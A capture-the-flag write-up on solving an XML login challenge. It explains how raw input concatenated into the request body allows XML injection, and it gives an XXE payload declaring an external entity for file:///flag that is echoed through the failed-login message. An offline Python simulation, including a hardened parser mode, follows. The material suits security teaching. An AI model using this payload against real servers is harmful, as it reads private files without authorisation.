Challenge source code (client side; the server-side doLogin.php is not shown)
function doLogin(){
    var username = $("#username").val();
    var password = $("#password").val();
    if(username == "" || password == ""){
        alert("Please enter the username and password!");
        return;
    }
    // Request body is built by string concatenation: the raw input lands inside the XML unescaped
    var data = "<user><username>" + username + "</username><password>" + password + "</password></user>";
    $.ajax({
        type: "POST",
        url: "doLogin.php",
        contentType: "application/xml;charset=utf-8",
        data: data,
        dataType: "xml",
        anysc: false,   // typo in the challenge source (meant "async"); jQuery ignores the unknown key
        success: function (result) {
            var code = result.getElementsByTagName("code")[0].childNodes[0].nodeValue;
            var msg = result.getElementsByTagName("msg")[0].childNodes[0].nodeValue;
            if(code == "0"){
                $(".msg").text(msg + " login fail!");
            }else if(code == "1"){
                $(".msg").text(msg + " login success!");
            }else{
                $(".msg").text("error:" + msg);
            }
        },
        error: function (XMLHttpRequest,textStatus,errorThrown) {
            $(".msg").text(errorThrown + ':' + textStatus);
        }
    });
}
Vulnerable point:
var data = "<user><username>" + username + "</username><password>" + password + "</password></user>";
The username and password are concatenated straight into the XML body without escaping, so you can inject your own XML markup (XML injection). In addition, when the login fails the TIPS area displays "(username) login fail!".
The username is therefore echoed back, and that echo is the reflection point we use to read out the flag.
Build the payload so that the failed login puts the username into <msg>; because the username is a reference to an XML external entity, what gets displayed is the content of file:///flag instead. This relies on the server-side parser in doLogin.php resolving external entities (the server code is not shown, but the behaviour confirms it does).
<!DOCTYPE note [<!ENTITY xxe SYSTEM "file:///flag">]> declares the external entity: its name (xxe) and the address it is loaded from (file:///flag)
Full request body:
<!DOCTYPE note [<!ENTITY xxe SYSTEM "file:///flag">
]>
<user>
<username>
&xxe; (note the trailing ; here, the reference is "&xxe;")
</username>
<password>111</password></user>
At first I stupidly kept building the payload in the input box alone, completely forgetting that I could capture the request with Burp and put <!DOCTYPE note [
<!ENTITY xxe SYSTEM "file:///flag">]> at the front, changing its position freely.
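The following is an added example, not code from the challenge or the write-up. Since doLogin.php is not on the page, it reproduces both halves of the exchange in Python's stdlib expat binding as a hypothetical stand-in: the client-side string concatenation from doLogin(), a server that parses the body and echoes the username in <msg> on failure, and an entity resolver that serves a constructed in-memory file:///flag so everything runs offline. The names FAKE_FS, build_login_body, xxe_payload, input_box_attempt, parse_login, do_login and the admin/admin credentials are all assumptions of this example. It also covers the last point above: a DOCTYPE typed into the username field ends up inside <username> and is not well-formed XML, which is why the declaration has to be moved in front of the root element in Burp.

```python
"""Added example (not the challenge's code): XXE via concatenated XML login body."""
import xml.parsers.expat as expat

# Constructed stand-in for the target's filesystem; not real data.
FAKE_FS = {"file:///flag": "flag{constructed_example_only}"}


def build_login_body(username, password):
    """Mirror of the string concatenation in the client-side doLogin()."""
    return ("<user><username>" + username + "</username>"
            "<password>" + password + "</password></user>")


def xxe_payload(target="file:///flag", password="111"):
    """Body as sent from Burp: the DOCTYPE must precede the root element."""
    return ('<!DOCTYPE note [<!ENTITY xxe SYSTEM "%s">]>' % target
            + build_login_body("&xxe;", password))


def input_box_attempt(target="file:///flag", password="111"):
    """What the page sends if the whole payload is typed into the username box:
    the DOCTYPE lands inside <username>, which is not well-formed XML."""
    return build_login_body(
        '<!DOCTYPE note [<!ENTITY xxe SYSTEM "%s">]>&xxe;' % target, password)


def parse_login(body, resolve_external):
    """Hypothetical server-side parse; returns (username, password) text.

    resolve_external=True mimics a parser configured to load external
    entities (the vulnerable setup).  False refuses the reference, so the
    parse fails instead of reading a file.
    """
    parser = expat.ParserCreate()
    fields = {}
    stack = []

    def start(name, attrs):
        stack.append(name)
        fields.setdefault(name, "")

    def end(name):
        stack.pop()

    def chars(data):
        if stack:
            fields[stack[-1]] += data  # entity text is appended to the open element

    def ext_ref(context, base, system_id, public_id):
        if not resolve_external:
            return 0  # expat turns this into an ExpatError
        # Vulnerable branch: fetch the SYSTEM URI and parse it as entity content.
        sub = parser.ExternalEntityParserCreate(context)
        sub.Parse(FAKE_FS.get(system_id, ""), True)
        return 1

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    parser.ExternalEntityRefHandler = ext_ref
    parser.Parse(body, True)
    return fields.get("username", ""), fields.get("password", "")


def do_login(body, resolve_external=True):
    """Mimic of doLogin.php's response: a failed login echoes the username in <msg>."""
    try:
        username, password = parse_login(body, resolve_external)
    except expat.ExpatError as err:
        return "<code>2</code><msg>bad xml: %s</msg>" % err
    if username == "admin" and password == "admin":  # constructed credentials
        return "<code>1</code><msg>%s</msg>" % username
    return "<code>0</code><msg>%s</msg>" % username


if __name__ == "__main__":
    print(do_login(xxe_payload()))                          # flag echoed in <msg>
    print(do_login(input_box_attempt()))                    # not well-formed
    print(do_login(xxe_payload(), resolve_external=False))  # hardened: refused
```

The reflection point is the <msg> element of the code 0 response: the username text, now the expanded entity, is what the client prints as "... login fail!". With the external reference refused, the same payload produces a parse error and no file content.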